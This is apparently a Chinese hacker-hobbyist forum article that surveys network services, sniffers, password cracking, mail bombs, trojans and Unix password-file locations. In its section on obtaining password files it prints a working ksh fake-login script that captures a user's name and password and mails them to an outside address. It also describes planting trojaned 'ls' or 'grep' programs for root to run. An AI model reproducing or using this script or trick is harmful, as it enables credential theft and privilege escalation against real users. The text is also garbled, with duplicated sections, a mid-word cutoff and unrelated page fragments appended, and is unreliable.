    极其不安全的,很容易受到IP欺骗和名字欺骗以及其它的欺骗技术的攻击。总的来说这样的托管模式不适合在Internet上使用。事实上
    因为地址信任非常不安全,所以不要相信自己说来自哪个主机的数据包。
    在有Firewall保护的网络中使用rlogin和rsh是可以的,这要看网络内部的安全措施。然而on依靠客户主机程序安全检查,每个人都可
    以假冒客户机而回避检查,因此on也是不安全的,即便是在有Firewall保护的局域网中使用也是如此(它能让任何一个用户以其它的用
    户名来运行任何一个参数)。现在很多主机已经废除了rexd服务器而使on失效。

    ●匿名的FTP服务
    使用匿名的FTP,用户可以匿名登陆FTP服务器。登陆时需要用户提供完整的E-mail地址做为passwd,其实在很多站点上这个要求形同虚
    设,你只要在其中包含有@字节看起来像个E-mail地址就行了,主机不会对口令做任何效验的。
    远程所提供FTP服务的主机在处理匿名用户的命令时,一般都会执行一个chroot命令让匿名者进入主机所允许的匿名FTP区域。然而为了
    支持匿名FTP和用户FTP,FTP服务器要访问所有文件,也就证明了FTP服务器不是总在chroot环境中运行的。这个环节会让一些愚蠢的管
    理员不知所为而未曾理会,很容易被黑客所利用而得到一个匿名FTP用户所不能得到的权限。一般解决这个问题可以通过修改inetd的配
    置来替代直接启动FTP服务器,它执行chroot(就类似于chrootuid的程序),然后再启动服务器就可以了。一般情况下,FTP只限于在匿
    名用户下访问,匿名用户有其正常的权限,在启动服务器前执行chroot就意味着匿名用户将受到限制。(注意:很多FTP服务器在其建立
    匿名FTP系统中只单纯的依赖自己购买FTP服务器的销售说明书中所讲述的来做,而往往这些销售说明中一般都不会谈到漏洞和堵塞漏洞
    的方法,这个大意是绝对致命的)。如果说一个匿名用户在FTP服务器的匿名区域获得了一份不应该是匿名用户获得的文件,那么就说明
    了可能有内部客户将这个文件放置在匿名的FTP区域了。在很多网络攻击事例中用匿名用户可以阅读到passwd密码档这就是管理员很大错
    误表现。


    ●网络上成员信息查询
    可查询成员信息的finger服务:
    finger服务可以做到查询在目标主机上有帐号的用户的个人信息,不管这个用户是否当前有在登陆这个主机都可查询。而像finger一般查
    询到的这些信息包括登陆名、最近在什么时候什么地方登陆的情况以及用户的简介。
    使用finger命令的时候,有三种使用方法:
    *finger@host 命令,这将列出的是在目标主机上登陆的每个用户的信息;
    *finger user@host命令将会列出主机上用户的信息。
    *finger str@host命令 不知道用户名,将提供包括指定的字符串str的任何用户的用户名或者真实名。
    其实在很多时候finger将会给黑客提供很多有用的信息,比如用户名和用户的信息之类的,往往给黑客用来跑口令生字典起到很大的帮助。
    而现在大多主机已经取消了这个服务,只是有主机内部而阻止了内部网以外的finger请求或仅仅只给一点点信息。
    在这里要特别注意的是如果那台主机现在使用的finger程序版本是GNU finger V1.37,那么这个程序将允许finger命令请求者读取系统上的
    任何文件,包括……
    另一个主机信息查询whois服务:
    whois服务类似于finger,但whois所得到的信息是主机、网络、领域以及它们的管理员。在缺省的状态下whois客户机在Internet的网络信息
    中心rs.internic.net查询主机,其中包括Internet领域和管理员信息。
    有些站点用whois协议来写服务器程序,以便发布用户信息,只是根据主机的自身情况而减少了发出更多的信息,但是往往这一点对黑客而言
    都是很重要的。

    ●名字服务
    在Internet中,当使用的主机名与机器使用的数字IP地址之间进行转换,这就是名字服务。在早些时候的Internet中,网络上的每个站点都保
    留一个主机列表,其中列有相关的每个机器的名字以及它的IP地址。后来随着主机的增加,再保留这份列表就似乎不太现实了,也很难这样去
    做,因为如此以来列表将可能超乎想象的大,再有就是当其它机器改变名字和所对应的地址的时候,主机的列表将不能做到及时的修改。鉴于
    如此,INternet就有了域名服务DNS而将其取而代之。
    DNS允许每个站点保留自己的主机信息,也可以查询其它站点的信息。DNS本质上不算是一个用户级服务,但是它是FTP、SMTP和telnet的基础,
    每个其它服务都可能用到它。我想很多人愿意使用的是名字而不是另人头痛的IP地址。况且许多使用匿名FTP服务器还要进行名字和地址的双重
    交换,否则你将不被允许从你的机器登陆到那台FTP服务器的。
    一般一个企业网都必须使用和提供名字服务,这样就可以方便的汇入Internet中。但是提供DNS服务有可能会泄露企业网内部机器的信息。在DNS
    的数据库文件中往往包含一些主机信息的记录,这些信息如果不加以保护是很容易被外界得到,也很容易给黑客提供到一些可以攻击的有用的信
    息(像机器所用的操作系统等信息)。
    内部使用DNS和依赖主机名进行认证,将会使主机无法抵抗那些建立伪装DNS服务器的入侵。同时事实也验证了使用IP地址来认证所需的更安全的服
    务来防止名字欺骗技术和要认证用户名而不是主机名衡量IP地址不可靠去防止IP欺骗技术也不是完全安全的。

    ●时间服务
    NTP网络时间协议是Internet中的一个服务,它能把主机系统里的时间设置的很准确。在很多情况下,使用不同机器间的时间同步是很重要的(现在
    多数DCE中的认证技术就是依赖于时间同步)。有一种回放入侵技术就是记录下一个交互操作,然后反复运行,如果设置了同步时钟就可以防止这种
    侵袭了(在记录中做时间标志)。

    ●协议TCP和UDP
    这个层次是对应于OSI参考模型的传输层。在这一层定义了两个协议:一个是TCP协议(即传输控制协议,是个可靠的、面向连接的协议),它允许在
    Internet上俩台主机间信息的无差错传输。它将接收到的很长的字节流分段。依次传送给网络层。在目标主机端,TCP接收进程将收到的信息重新装配
    成源主机TCP层发送的形式,交给应用层。TCP还进行流量控制,以避免发送过快,使速度较慢的主机不至于因为过多的书记达到而发生拥挤。然而这一
    切对用户完全是透明的,普通用户不知道也无需理会这些底层的TCP/IP协议。
    在网络传输中,为了保证数据在网络中传输的正确有序,使用了“连接”这个概念。一个TCP连接指的是传输数据之前先要传送三次信号,以便双方为
    数据的传述做好准备。三次握手信号传送之后两台主机间才开始传送数据。而发送的每一个数据包都有它的编号接收方的主机每收到一个数据包后都要
    向发送的主机发送一个表示已收到的信息。如果发送的信息在信道上出了错或者丢了,那么发送的主机就要重新再发这个数据包了。当发送完结之后两
    台主机还要一起释放这个连接。
    无连接方式则显得省事一点了。安定能够源主机有数据的时候就发包。它不管发送的数据是不是能到达目标机器,也不管是不是出了错,而目标接收机
    器也不会告诉发送的主机是否正确,因此这样的数据传送方式是不可靠的。
    两种都有两种的优点和缺点。面向连接的方式是可靠的,但是在通信的进程中传送了许多与数据无关的信息,从而大大降低信道的利用率,这样的面向
    连接常用于一些对数据要求可靠性比较高的应用。无连接的当时不可靠,但是它不会传输一些与数据本身无关系的信息,所以速度较高。它常用于一些实
    时服务,也可用于对差错不敏感的应用,比如声音、图象等。
    ● Net
    环境文件,可用于控制NetBIOS网络资源,它的命令几乎可以提供所有的NetBIOS网络功能,在这里我只能把它的子命令写出来,
    你可以一个个试试了:
    accounts、computer、print、send、name、use、user、view、pause、localgroup、share、config、file、continue、
    group、help、stop、start、time、session、statistics
    …………

    ● Netstat
    环境文件,用于显示当前TCP/IP的连接及状态。你可以输入/?参数的命令,就可以看到一些关于它的命令字符了。如果你想连
    续监听正在进行的连接状态的话,你可以利用间隔设定定期、自动刷新显示(例如:netstat -a 5)这样将会在5秒内显示一次
    全部的TCP/IP连接状况,包括服务器监听的端口,想停止它按Ctrl+Break键即可。。。。。。

    ● Ping(子弹啊。。呵呵)
    环境文件,可用于发送ICMP回送报文到远程系统,以确定该系统是不是可进一步用于TCP/IP业务(也或者可以看你炸完了后的
    结果,~-~)。借助ping检测主机是否还存在工作,它在TCP/IP中常用动词"Did you ping the server?"。输入不带命令的ping
    参数你可以看到所描述的命令。简单的ping可以确定不正常对象的工作,但是要对一台远程机子执行ping命令成功的话,你可以
    对方物理层、数据链路层和网络层的所有功能是不是正确,通信问题一般发生在更高层。黑客可以将ping用语各种侵害网络的目
    的,比如说利用ping通过发送大量的ping(子弹)分组,引起淹没的无效数据。一台机用这种方式不能起到作用,但是有多台机
    子同时发送这个命令的话,那么……,这也是一种拒绝服务的攻击,这种攻击能够造成远程系统TCP/IP服务器的崩溃。NT对这种
    攻击最为敏感……

    ● Telnet(远程登录)
    这个我就不多说了。但是想提示的就是许多路由器、交换机、防火墙,可以经过它连接到他们的IP地址进行配置,当然了,也可
    能被黑客远程配置,黑客可以经过telnet端口连接到IP。也可以经过防火墙阻断内部的telnet连接……

    ● Tracert
    可用于显示两个因特网通信主机间的路由器。由于大多数服务器在它的路由器接口采用有意义的名字,所以通常能够推断出两个
    主机间路由的有关情况。。。。。。

    ● NetAlert
    这是一个过时但却常用的东西,不过我还是觉得蛮有用。它可用于监控目标TCP/IP服务的状态。它通过周期介入方式监测。当端
    口的状态开或者关的时候,它就会发邮件信息通知你。但是它需要邮件程序Blat1.2或者以上,才能利用邮件功能。。。。。

    ● NAT(NetBIOS Auditing Tool)
    从物理意义上看这个是一种NetBIOS安全审记或者监察工具,实质它的目的可以揭示NetBIOS网络中的安全缺陷,是比较实际的,
    现在有很多工具可用与此。它的功能之一就是自动口令检查,对黑客来说……呵呵。用它你可以针对一台NT服务器(好象对
    UNIX也可以耶)自动发出攻击,通过多次尝试帐号口令并试图经过NetBIOS进行连接(可以允许远程机器映射驱动器)。
    它可以接受帐号列表和口令列表,然后照着出现的次序针对每个帐号和口令进行攻击……
    它接受三种命令参数:
    -o(指定重定向输出到的记录文件)
    -u(指定帐号的文本文件)
    -p(指定针对每个帐号的口令的文本文件)
    不过现在有很多方法可以阻止NAT的攻击,比如通过重命名Administrator帐号和限制Administrator帐号注册网络等等。。。。。

    ● Ethernet Sniffer
    Sniffer是如今众多的网络闯入的一种途径,计算机在网络中虽然是共享信道,但是它一般只接受信息包中的目的地址与自己网络地
    址相符的信息包,而不接受网上传输的发往其它计算机的信息包。除了广播包,这些信息包的头目的地址全部都是0或者1,因此网络
    上所有的计算机都可以阅读它。但如果某台机器可以接受所有信息,而不论这些信息是发给谁的,那么这台机器就可以称之为Sniffer。
    它可能是网络中的系统管理员用语管理的,但是大多时候是黑客用来入侵机器的。由于帐号与口令在以太网上是以文本格式传输的,
    因此,黑客要是有办法控制Sniffer的话,那么网络上的所有机器便处于危险之中。。

    ● 如何知道自己是否被窃听
    窃听可能是通过专用的硬件,也可能是通过运行一些窃听软件执行的。首先要沿着网络的物理布线边走边仔细地检查网络的每一个连
    接处。排除硬件上的可能性后,接下来就检测是否有软件窃听。当窃听程序运行的时候,被窃听的计算机的端口会被改成许偌模式,在
    这种方式下,才能够窃听到所有的数据包。在SunOs、NetBSD和基于BSD的Unix系统下运行“ifconfig -a”命令,它会告诉你该机器所有
    端口的信息,以及他们是否处于危险的许偌模式下。在DEC OSF/1和IRIX等系统中就没有这么方便了,需要你指定检测哪个端口才行的。
    在这种情况下可以先运行netstat -r来看看有多少个端口。找到了端口后就用#ifconfig le0来检测……(一般有经验的入侵者会把
    "ifconfig"这类命令替换掉,以用来逃避检测。这时你可以用一些工具,像cpm就可以自动检测端口,它运行在SunOS操作系统下。)一些
    窃听程序运行时,它会通过访问数据包设备把正在网络上传输的数据包复制一份,存储到网络主机上,形成一个随时间不断增长的文件,
    这个文件通常很大,在一个流通量高的网络上,这个文件会更加庞大的。有一种叫Lsof(List Open Files)的工具能够查找出这些不断增长
    的文件,并能够找出正在访问数据包设备的程序,在SunOS中这个设备名是/dev/nit。


    ● 让你了解黑客攻击口令的手段
    黑客攻击目标的时候一般都是把破解不同用户的口令作为攻击的开始。他们先用“finger远端主机名”找出主机上的用户帐号,然后
    就采用字典穷举法进行攻击。它的原理是根据网络上的用户常常采用的一些E文单词或者自己的姓氏作为口令的实际情况,通过一些程
    序自动地从机器字典中取出一个单词作为用户的口令输入给远程的主机尝试进入系统。若是口令错误,就按次序取出下一个单词这样
    循环下去,直到找出正确的口令或者字典的单词用完为止(这是一种吐血加上网费用高涨的形式,我不能如此,呵呵)。最典型的字典
    代表就是LetMeIn version 2.0了,而我更是喜欢国产的像浩哥的“万用钥匙”和小榕的“黑客字典”等。
    要是这些以上的方法不行的话,黑客就会寻找目标机器的薄弱环节和安全方面的漏洞,伺机夺取目标中存放的口令文件passwd或shadow。
    现在的Unix系统,用户的基本信息存放在passwd文件中,而所有的口令则经过DES加密法加密后专门存放在一个叫做"shadow"(影子)的
    文件中,并且处于严密的保护之下。老版的Unix没有shadow文件,它的口令都放在passwd文件中。要是获得了口令,那么黑客就会用专门
    破解DES加密法的程序来破解口令。

    ● 取得口令文件的简捷方法
    1、在能访问对方机器的情况下,把shell命令用ksh运行即可。如下:
    clear
    stty ignbrk
    echo"login:/c"
    read logname
    stty -echo
    echo"password:/C"
    read passwd
    print"/nlogin incorrect/n"
    print $logname $passwd | mail cxterm.bbs@jet.ncic.an.cn
    stty 0
    stty echo
    exit
    2、在自己能用的目录里放上“ls”、“grep”之类的程序,希望root能不小心运行到它们(嘿嘿。虽然有些像守株待兔,但是大多时候
    你必须这样),root一旦运行,你就可以获得root权限。所以root的PATH里不应当有"."的当前目录。
    3、更彻底的方法是根据passwd文件里的密文算口令的明文。
    首先你必须取得对方含有密文的passwd文件(如果是有shadow"影子" passwd的机器上需要取得/etc/shadow)。如果得到后你可以借
    助一些工具把这个文件还原成可视的密码原文。现在大多数的工具都开始傻瓜化了,所以在这方面操作也就简单了。

    ● E-mail bomb 电子信箱炸弹
    信箱炸弹也是一般黑客常用的攻击手段之一。相对于其它的手段来说mail bomb可谓简单快洁。所谓的信箱炸弹实际是一个地址不详、容量
    很大、充满乱码或脏话的恶意邮件,也是垃圾邮件。每个人的邮件信箱都是有限空间的,所以当这种大量的垃圾到了你的信箱之后就会导致
    信箱容量不够而把正常的邮件冲掉,同时占用了大量的网络资源,而导致阻塞,使你不能正常运行系统。现在来说,网络你都可以下到很多
    这类邮件炸弹的程序,而且有逐渐普及的趋势。嘿嘿。看来我们都得有点准备才行。(我没用过邮件炸弹,因为从理念上来讲我认为邮件炸弹
    更像一种懦夫行为。)在邮件炸弹中最为典型的代表就是KaBoom!了,而现在的KaBoom! v3.0版更是比以前增加了很多功能,它可以不间断
    的发信,而常用的匿名邮件服务器的地址列表也都做在了程序里了,用户还可以自己增加新的功能。再就是可以为所攻击的人订阅一些大量
    邮件讨论组,还多了一些很搞笑的音效。启动这个程序后会出现一个小窗口,分别有3个按钮,它们为Mailbomber(炸人)、Mailing Lists
    (为别人订阅邮件组)和Close(退出),操作很简单。但我不希望你因我的这篇文章而去用它。

    ● 特洛伊木马(Trojan horse)
    我想这个大家应该是熟知的了。特洛伊木马是一类恶意的危害安全的程序,它和病毒的区别是特洛伊木马不可以自行传播,而是依靠寄生或
    人为的“种植”而传播的。最为著名的特洛伊木马称为PKZIP300,文件名称可能是PKZIP300.ZIP或者EXE文件了,看来似乎是PKZIP的最新版本。
    如果你发现了该程序最明智的选择就是别去下载,因为你要是运行了它它会把硬盘清除并干扰猫的使用。现在很大部分人分不清远程控制器和
    木马之间到底是一样呢还是不一样。其实它们区别很大,我在这里就不很详细的说明了,但是希望大家知道一点就是远程控制器所运行的环境
    则是需要一个木马来支持的(通常这个木马被称为S端,也就是服务端)。而很多时候这些是被黑客使用。

    ● 关于PGP的介绍
    PGP是E文"Pretty Good Privacy"(良好隐私)的缩写。它的创始者是USA的Phil Zimmermann。他把RSA公匙体系的安全方便和传统加密体系的
    告诉结合起来,并且在数字签名和密匙认证管理机制上有很好的设计,所以PGP是目前较为流行的加密软件包。PGP目前运行在MS-DOS、Unix、
    VAX/AMS等各种不同类型的操作系统上的版本。它是一种大众使用的加密软件大家都知道在Internet上传输的数据是不加密的,所以如果你自己
    不保护自己的信息的话,那么可能被黑客利用而获得你的隐私。。。。。PGP的命令参数我看了就头晕,因为我只是爱好而已,所以不会花时间
    和经理去研究它的,但我知道有一个叫PGPSHELL的工具可以让你简单的生成自己的密匙。

    ● 什么是缓冲区溢出
    缓冲区溢出(bufer overflow)指的是一种系统攻击的手段,通过往程序的缓冲区写入超出其长度的内容,而造成缓冲区的溢出,从而破坏程序
    的堆栈,使程序转而执行其他的命令,以达到攻击的目的。而造成缓冲区溢出的原因是程序中没有仔细检查用户输入的参数。最为常见的手段
    是通过使某个特殊程序的缓冲区溢出而执行一个shell,通过shell的权限可以执行高级的命令。如果这个特殊程序属于root并且有suid的话,
    攻击者便可获得一个具有root权限的shell。那么是怎么样才可以制造缓冲区溢出呢?其实关于这些方面的实例在网上都有很多。你可以找找,
    别问我,我不知道。~-~

    ● 关于Unix系统
    Unix是在1969年由ken Thompson、Dennis Ritchie与一些人在一部PDP-7上进行的一些工作,后来这个系统变成了Unix。由于AT&T、Berkeley等
    组织的介入,使的Unix的发展得以壮大,并且逐渐形成了两大流派,那就是AT&T的System V跟伯克利软件组织的BSD。而SVR4则是两大流派融合
    后的产物。在其间1991年底,开放软件组织(Open Software Foundation)推出了OSF/1试图与System V抗衡,但是现在来看OSF/1就有些不自量
    力了。

    ● 不同UNIX系统中口令文件的位置

    系统 路 径 符号
    UNICOS /etc/udb *

    Ultrix 4 /etc/auth[.dir|.pag] *

    System V Release 4.0 /etc/shadow x

    System V Release 4.2 /etc/security/*database x

    Linux1.1 /etc/shadow *

    IRIX5 /etc/shadow X

    EP/IX /etc/shadow X

    HP-UX /.secure/etc/passwd *

    DG/UX /etc/tcb/aa/user *

    ConvexOS 10/11 /etc/shadow *

    BSD4.3-Reno /etc/master.passwd *

    A/UX 3.0s /tcb/files/auth/?/*

    SunOS5.0 /etc/shadow

    OSF/1 /etc/passwd[.dir|.pag] *

    SunOS4.1+c2 /etc/security/passwd.adjunct ##username

    AIX 3 /etc/security/passwd ! #
    /tcb/auth/files/

    SCO Unix #.2.x /tcb/auth/files// *


    系统 路 径 符号
    UNICOS /etc/udb *

    Ultrix 4 /etc/auth[.dir|.pag] *

    System V Release 4.0 /etc/shadow x

    System V Release4.2 /etc/security/*database x

    Linux1.1 /etc/shadow *

    IRIX5 /etc/shadow X

    EP/IX /etc/shadow X

    HP-UX /.secure/etc/passwd *

    DG/UX /etc/tcb/aa/user *

    ConvexOS 10/11 /etc/shadow *

    BSD4.3-Reno /etc/master.passwd *

    A/UX3.0s /tcb/files/auth/?/*

    SunOS5.0 /etc/shadow

    OSF/1 /etc/passwd[.dir|.pag] *

    SunOS4.1+c2 /etc/security/passwd.adjunct ##username

    AIX 3 /etc/security/passwd ! #
    /tcb/auth/files/

    SCO Unix #.2.x /tcb/auth/files// *

    ● 关于扫描工具的基础知识
    在现在所有的Unix和windows等平台以及网络之中,都存在着相当多的安全隐患,而这些安全隐患的产生往往会导致使用者受到攻击或者错
    误,这样以来,就需要一种能扫描出这些隐患的工具,把这些隐患扫描出来,而进行修改和填补。所以就产生了网络种的扫描工具。而对于
    黑客来讲扫描工具是一种绝对必备的攻击工具,因为通过扫描黑客可以不留痕迹的检测到远程机器在安全性方面弱点的程序包。扫描工具虽
    然可以让你找到系统的安全隐患,但是使用者还必须具备很多相关系统安全的知识,对扫描到的数据的理解是非常必要的。你也可以自己编
    写一个扫描,扫描工具的其实并非难事,你只要具备TCP/IP相关的知识,以及C、shell或perl等一种或多种脚本语言(当然了,你还得去了
    解一下Socket编程的知识)就可以自己编写一个自己的扫描工具了。大多扫描工具的原理都是相同的,你如果有兴趣自己写的话可以先从简
    单的端口扫描程序开始就稍微好点。

    ● 关于NIS系统
    NIS(以前也叫黄页服务,即YP)的实现是基于远程过程RPC协议的,她使用外部数据表示标准。NIS是由Sun Microsystem开发的,主要功能
    是可以降低维护和配置UNIX网络系统的工作量。这是通过将每台机器的配置文件集中到一个NIS服务器上来实现的,因此如果改变NIS服务器
    上的配置文件就可以完成对每台客户机的配置。而做位一个网络工具,它本身也存在有安全问题。而利用伪装成NIS服务器的方法,也是一个
    比较流行的黑客攻击方式。往往NIS存在的安全隐患可以影响到UNIX配置文件/etc/passwd被映射成passwd.byname和passwd.byuid……并且使
    攻击者获得root的访问权限。一般利用NIS做入侵的程序使用了Sun提供的Network Interface Tap软件模块,可以改变外部的数据包源IP地址。
    以便能够使攻击者伪装成NIS服务器来获取权限……

    ● 关于NFS的协议
    mount协议是NFS客户和NFS服务器用来进行初始化协商的,协商的内容包括:向客户端返回一个文件系统的句柄,报告被安装的文件系统的清
    单,清除一个客户安装文件系统的记录,以及向客户报告可被安装的文件系统的清单。NFS协议是建立在mount协议之上的,通过NFS协议一个
    客户可以列出所安装文件系统的目录清单,得到文件或者怒路的句柄,甚至可以创建、读写和修改文件。
    正确建立了NFS包括客户和服务器的正确配置,NFS对于用户将是透明的,在一个客户端为了使用NFS需要运行biod、rpc.lockd和rpc.statd进
    程。这些进程通常在系统的一个用语引导的脚本文件中被执行到,也可以手工启动……
    而服务器端的NFS是通过启动nfsd和rpc.mount进程以及rpc.lock和rpc.statd进程来提供。同样这些进程通常在系统的一个引导的脚本文件中
    被执行到。你也可以手工启动。


    ● 关于端口
    自从学会了上网到现在,只要一连接到我的ISP就会满脑子的出现一些端口数字号,真是让人迷惑^*^。在Internet中每一台主机上,常常同时
    运行着多个服务器进程,当与这台主机通信的时候,不但需要指出通信主机的地址,还要指明的就是这个主机上的某个服务通信道,而通常用
    端口号来标识主机上这些不同的服务信道。端口号是一个16位的数,可以从1编到65535,在实际中,端口就像是一个国家的边防关卡。它的开
    与关往往表示着国家的改革开放与搞活(这台主机拥有着某种服务),但是开放了总得要你出示你的过镜身份的证明,而不加以控制的开放那
    么这个关卡可真就危险了。科学一点的说端口是这样的:……许多daemon程序可以在Internet上被初始化。它们中的绝大多数是客户的程序。
    每当一个连接请求到达的时候,就会有一个服务器进程被启动,并由它与发出请求的客户端机器进行通信。为了促进这个进程,每个应用程序
    都被赋予一个唯一的地址,它就称为端口。像FTP的是21、Telnet的是23、冰河木马的是7626……每个应用程序均与某个特殊的端口联系,当与
    该端口有关的任何连接请求到达时,相应的应用程序就被启动(inetd就是这样的一个启动其他应用程序的程序)。
    这里列及一些常用的端口及相应的服务或应用以攻参考:
    文件传输协议(FTP) TCP port21
    Telnet TCP Port23
    简单邮件传输协议(SMTP)TCP Port25
    Gopher TCP Port70
    Finger TCP Port79
    超文本传输协议(HTTP) TCP Port80
    网络新闻传输协议(NNTP)TCP Port119
    系统时间服务(NTP) TCP/UDP Port37
    这里说一些题外话了,现在很多初学者很是热衷于聊天室或者BBS上破解别人的口令,但又不知从何入手。其实因为聊天室或者BBS上在你发出
    信息的时候就是响应了某个端口号而进行的,如果你的破解有针对性的话,那么破解就会变的简单起来了。^*^
    非难事,你只要具备TCP/IP相关的知识,以及C、shell或perl等一种或多种脚本语言(当然了,你还得去了
    解一下Socket编程的知识)就可以自己编写一个自己的扫描工具了。大多扫描工具的原理都是相同的,你如果有兴趣自己写的话可以先从简
    单的端口扫描程序开始就稍微好点。

    ● 关于NIS系统
    NIS(以前也叫黄页服务,即YP)的实现是基于远程过程RPC协议的,她使用外部数据表示标准。NIS是由Sun Microsystem开发的,主要功能
    是可以降低维护和配置UNIX网络系统的工作量。这是通过将每台机器的配置文件集中到一个NIS服务器上来实现的,因此如果改变NIS服务器
    上的配置文件就可以完成对每台客户机的配置。而做位一个网络工具,它本身也存在有安全问题。而利用伪装成NIS服务器的方法,也是一个
    比较流行的黑客攻击方式。往往NIS存在的安全隐患可以影响到UNIX配置文件/etc/passwd被映射成passwd.byname和passwd.byuid……并且使
    攻击者获得root的访问权限。一般利用NIS做入侵的程序使用了Sun提供的Network Interface Tap软件模块,可以改变外部的数据包源IP地址。
    以便能够使攻击者伪装成NIS服务器来获取权限……

    ● 关于NFS的协议
    mount协议是NFS客户和NFS服务器用来进行初始化协商的,协商的内容包括:向客户端返回一个文件系统的句柄,报告被安装的文件系统的清单,清除一个客户安装文件系统的记录,以及向客户报告可被安装的文件系统的清单。NFS协议是建立在mount协议之上的,通过NFS协议一个
    客户可以列出所安装文件系统的目录清单,得到文件或者怒路的句柄,甚至可以创建、读写和修改文件。
    正确建立了N

    ==========================================================
    来自新新论坛:http://www.yancity.com/bbs/

    展开全文
  • 基本网络配置命令及设置网络参数

    万次阅读 2018-09-27 19:40:32
    一、 基本网络配置命令 1、 ifconfig命令 2、 hostname命令 3、 route命令 4、 netstat命令 5、 ping 命令 6、 traceroute 命令 7、 nslookup 命令 二、 设置网络参数 1、 临时设置 2、 固定设置 3、 设置...

    目录
    一、 基本网络配置命令
    1、 ifconfig命令
    2、 hostname命令
    3、 route命令
    4、 netstat命令
    5、 ping 命令
    6、 traceroute 命令
    7、 nslookup 命令
    二、 设置网络参数
    1、 临时设置
    2、 固定设置
    3、 设置网络接口参数
    4、 设置路由记录
    5、 网卡配置
    6、重启网络服务
    7、主机名配置
    8、域名解析配置
    9、本地主机映射文件
    10、hosts文件与DNS服务器比较

    一、基本网络配置
    1、ifconfig命令
    (1)用途:查看网络接口信息。
    (2)所有提供服务的服务器,必须是固定IP地址。
    (3)ipconfig
    查看所有活动网络接口的信息。
    (4)ipconfig 网络接口 (查看此网路接口的信息)
    2、hostname命令
    (1)用途:查看和配置主机名称。
    (2)格式:hostname name
    暂时改名,而且改名之后要退出当前bash才能生效,重启后失效
    3、route命令
    (1)用途:查看或设置主机中的路由信息
    (2)格式route [-n]
    以数字的形式显示路由表。
    4、netstat命令
    (1)用途:查看系统的网络连接状态,路由表,接口统计等信息
    (2)格式:netstat [选项]
    (3)选项:
    ①-a:显示所有活动连接。
    ②-n:以数字形式显示。
    ③-p:显示进程信息
    ④-t:显示tcp连接
    ⑤-u:显示udp连接
    ⑥-r:显示路由表信息
    (4)常用组合:
    ①netstat -anpt 查看所有tcp连接信息

    ②netstatt -anpu 查看所有udp连接信息
    5、ping 命令
    (1)用途:测试网络的连通性。
    (2)格式:ping [选项] 目标主机
    6、traceroute 命令
    (1)用途;测试从当前主机到目的主机之间经过的网络节点。
    (2)格式:traceroute 目标主机地址

    7、nslookup 命令
    (1)用途:测试DNS的域名解析
    (2)解决依赖关系:
    yum install bind-utils
    (3)格式:nslookup 目标主机地址 DNS服务器地址
    二、设置网络参数
    1、临时设置
    (1)特点:
    ①使用命令调整网络参数
    ②简单,快速,可直接修改运行中的网络参数
    ③一般只适合在调试网络的过程中使用
    ④系统重启以后,所做的修改将会消失
    2、固定设置
    (1)特点:
    ①通过配置文件修改网络参数
    ②修改各项网络参数的配置文件
    ③适合对服务器设置固定参数时使用
    ④需要重新加载网络服务或重启后才生效
    3、设置网络接口参数
    (1)设置网络接口的IP地址,子网掩码
    Ifconfig 接口名 IP地址 [netmask 子网掩码]

    (2)禁用或重新激活网卡
    Ifconfig 网络接口 up/down

    (3)设置虚拟网络接口
    Ifconfig 接口名:序号 IP地址

    4、设置路由记录
    (1)删除路由表中的默认网关
    route del default gw ip地址

    (2)添加默认网关路由
    route add default gw ip地址

    (3)添加指定网段的路由记录
    route add -net 网段地址 gw ip地址
    route add -net 192.168.10.0 gw 192.168.10.1
    (4)删除指定网段的路由条目
    route del -net 网段地址
    5、网卡配置
    (1)配置文件位置:/etc/sysconfig/network-scripts/
    (2)ifcfg-eth0 第一块以太网卡配置文---------cent6
    (3)DEVICE=eth0 设备名称
    (4)ONBOOT=yes 是否开机启动
    (5)BOOTPROTO=static 或者ip地址的方式 dhcp/static/
    (6)IPADDR=ip地址
    (7)NETMASK=子网掩码
    (8)GATEWAY=网关
    (9)DNS1=第一个dns服务器地址

    6、重启网络服务
    service network restart

    7、主机名配置
    (1)配置文件
    /etc/sysconfig/network

    8、域名解析配置
    (1)文件位置:/etc/resolv.conf
    (2)用途:保存本机需要使用的DNS服务器的ip地址

    (3)ex:
    nameserver 114.114.114.114
    9、本地主机映射文件
    (1)文件位置:/etc/hosts
    (2)用途:保存主机与ip地址的映射记录

    10、hosts文件与DNS服务器比较
    (1)默认情况下,系统首先从hosts文件查找解析记录
    (2)hosts文件只对当前的主机有效
    (3)hosts文件可以减少DNS的查询过程,从而加快访问速度

    展开全文
  • 1.学会使用Ping、IPConfig、TraceRt、Netstat、ARP等常用网络命令。 2.学会配置网络接口IP属性(IP地址、子网掩码、默认网关)。   二、实验环境:  Windows下Dos窗口下的命令提示符     三、实验内容...
  • Linux系统中网络管理命令和查看网络配置的命令

    千次阅读 多人点赞 2020-07-09 14:31:21
    1.1 查看网络接口信息——ip命令 1.1.1 小知识——nmcli和nmtui命令 1.2 查看DNS服务器地址 1.3 查看本机路由表 1.4 查看本机主机名称 二.网络管理命令 2.1 概述 2.2 测试主机之间的连通性——ping命令 2.3 查看网络...
  • 一 网卡IP地址设置 1.采用最小安装完Linux系统后暂时无法上网,需要对网络适配器进行配置。...输入命令“vi /etc/sysconfig/network-scripts/ifcfg-ens33” 注意:此处由于真机的网关是20.0.0.1,所以
  • 常用网络安全命令

    千次阅读 多人点赞 2020-04-02 13:53:09
    常用网络安全命令 0. 首先打开cmd win+r 1. ipconfig命令 主要功能:显示本地主机IP地址、子网掩码、默认网关、MAC地址等 C:\> ipconfig/all 2.ping命令 主要功能:目标主机的可达性、名称、IP地址、路由...
  • 入门学习Linux常用必会60个命令实例详解doc/txt

    千次下载 热门讨论 2011-06-09 00:08:45
    网络操作命令:ifconfig、ip、ping、netstat、telnet、ftp、route、rlogin、rcp、finger、mail、 nslookup; ◆ 系统安全相关命令:passwd、su、umask、chgrp、chmod、chown、chattr、sudo ps、who; ◆ 其它...
  • 9个常用网络命令

    万次阅读 多人点赞 2018-06-19 21:09:40
    ICMP的应用举例:1.ping;...ping是一个测试程序,如果ping运行正确,你大体上就可以排除网络访问层、网卡、modem的输入输出线路、电缆和路由器等存在的故障,从而减小了问题的范围。按照缺省设置,windows上运行的...
  • windows下网络诊断基本命令

    千次阅读 2017-05-03 16:18:07
    windows下网咯诊断基本命令: 1、ipconfig命令,显示TCP/IP配置 ipconfig/all 显示所有配置信息 ipconfig/release 释放ip地址 ipconfig/renew 重新获得一个ip地址,会向DHCP服务器发出新请求 ipconfig/flushdns...
  • 常用网络测试命令

    千次阅读 2020-04-28 15:56:28
    常用网络测试命令应用 一、ping Ping是测试网络联接状况以及信息包发送和接收状况非常有用的工具,网络测试最常用的命令。Ping向目标主机(地址)发送一个回送请求数据包,要求目标主机收到请求后给予答复,从而判断...
